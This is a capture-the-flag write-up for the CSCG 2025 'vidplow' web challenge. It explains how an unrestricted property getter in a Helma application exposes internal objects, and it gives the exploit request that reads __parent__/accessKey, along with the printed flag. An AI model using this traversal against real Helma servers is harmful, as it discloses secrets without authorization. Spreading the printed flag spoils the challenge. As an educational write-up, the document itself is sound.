---
title: vidplow - CSCG 2025 - Write-Up
date: 2025-04-24 10:03:00 +0200
categories: [Cyber Security Challenge Germany]
tags: [web,js]
description: Find a Information Disclosure vulnerability.
image:
  path: /assets/blog/vidplow/logo.png
  alt: CSCG image
---

This challenge is named "vidplow" and is in the Web Category. It is rated as easy and created by `Popax21`.

## Intro

> We recently stumbled upon an exposed SVN server of a large multimedia corporation, containing some of their backend application and internal tooling code. However, the access keys seem to not be the ones used in production - the real ones should fetch us quite a high price though, if we manage to get our hands on them that is. Just one problem - the tech stack seems to be really obscure, and no one on our team seems to have any clue what the heck is going on. Can you take a look, and maybe find some vulnerabilities in this thing?

For this challenge you are provided with the source code.

The code provided is the source code of a [Helma](https://github.com/helma-org/helma) application, it's a simple web application framework. You can verify that by looking at the `/manage/makekey` page, this page allows you to generate new passwords for the Hemla management console which should be available for every Helma instance.

## Vulnerabilities

If you check the `properties.js` in the Video object, you will find the getter function to get a property. These objects describe how the web pages inherently are displayed. The folders of the app represent the structure of the content and the site is basicly build to match the content objects.


```js
function getProperty(name) {
    if (name == "category") {
        return this._parent;
    } else {
        return this[name];
    }
}
```

This function allows you to get any property of the element, you can for example access the `_parent` object like above not with category but with `_parent`. With this vulnerability we have unrestricted access to the properties of a Hop object.

You can check the source code of the Hop object [here](https://github.com/helma-org/helma/blob/f1fa050ea5501dc73094d188fd94849cfe82d7c4/src/helma/scripting/rhino/HopObject.java), after line 918, you can see the private properties of the Hop object. You can check if they work for a property of a video. Some of them are retrievable others not, for particular interest are two the `_parent` and the `__created__`.

```
/Documentary/Music+Documentary/Rock+%26+Riot%3A+The+Samurai+Years/_parent
> /Documentary/Music+Documentary/
```

or 

```
Documentary/Music+Documentary/Rock+%26+Riot%3A+The+Samurai+Years/_id/
> 18
```

The idea now is to use a property to access the global node, because if you check the `functions.js`, you will see that the `accessKey`, which is the flag is saved in that object.

```js
function checkAccessKey(key) {
    if (key == global.getProperty("accessKey")) {
        return true;
    } else {
        res.reset();
        res.status = 401;
        res.write("Invalid access key");
        return false;
    }
}
```

If you further inspect the `properties.js` in the Property folder, you will see that the `getProperty` function allows you to access even properties of a property.

```js
function getProperty(name) {
    var prop = this.obj.getProperty(this.name);
    if (prop && prop.getProperty) {
        return prop.getProperty(name);
    } else {
        return null;
    }
}
```

So for example you could request `/_parent/name` to get the name of the parent Hop object.

To get the version of the running Helma application you can use the `__created__` property, this will return an error leaking the version `1.5.2`:
```
Error in application vidplow
Invalid JavaScript value of type java.util.Date (/usr/local/helma-1.5.2/apps/vidplow/HopObject/handler.js#2)
```

**Note:** This version is quite important because in the new version `_parent` and `__parent__` are the same.

## Exploit

With the vulnerabilities we found we need to find a way to get the global object. If you try some stuff you will find out that the `__parent__` object is a reference to the global object. In the source code of Helma under [src/helma/scripting/rhino/debug/VariableModel.java](https://github.com/helma-org/helma/blob/fb04c0528901d767f528c7457e900c0a3ef6e535/src/helma/scripting/rhino/debug/VariableModel.java#L210), you will find the `__parent__` property, which gives you access to the global properties including the `accessKey` which contains our flag.


Command for successfully finding the flag.

```sh
curl https://740bad955fd62aeccf2924c3-8080-vidplow.challenge.cscg.live:1337/Documentary/Arasaka%3A+The+Iron+Legacy/__parent__/accessKey
```


Flag:
```
dach2025{wh0_n33ds_n0de_j5_anyw4y_edabc46f6280250fc7e646dee1a3937c}
```
